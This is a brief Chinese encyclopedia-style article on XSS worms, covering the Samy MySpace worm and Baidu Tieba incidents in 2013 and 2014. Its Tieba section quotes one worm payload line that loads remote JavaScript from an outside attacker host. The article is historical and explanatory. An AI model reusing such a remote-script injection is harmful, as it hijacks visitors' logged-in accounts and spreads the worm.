xss蠕蟲(cross site scripting worm)是一種跨站病毒,通常由腳本語言Javascript寫成,它藉由網站訪問者傳播

歷史

編輯

歷史第一個XSS蠕蟲是針對網站Myspace的Samy,它在20小時內感染了100萬個賬戶,作者Samy Kamkar之後被起訴

新浪微博

編輯

對新浪微博的爭議#XSS.E6.BC.8F.E6.B4.9E

百度貼吧

編輯

2013年5月19日, 百度貼吧轉帖功能再度出現xss漏洞,大量貼吧內充斥接近滿版面, 包含代碼getScript('//xss.retaker.me/1.js')為標題的帖子,當已登陸用戶打開這樣的帖子,用戶所持賬戶便以相同方式在多個貼吧轉帖原作者的帖,部分網絡安全相關人士認為貼吧爆發了大規模XSS蠕蟲感染[1] [2] [3]

2014年3月9日, 百度貼吧轉帖功能再度出現xss漏洞

性質

編輯

由於XSS蠕蟲基於瀏覽器而不是操作系統,取決於其依賴網站的規模,它可以在短時間內達到對巨大數量的計算機感染

參考

編輯
  1. ^ 百度贴吧XSS蠕虫大量爬行. [2013-05-19]. (原始內容存檔於2020-08-11). 
  2. ^ 谷歌搜索
  3. ^ 新浪微博, "xss贴吧". [2013-05-19]. (原始內容存檔於2019-02-07).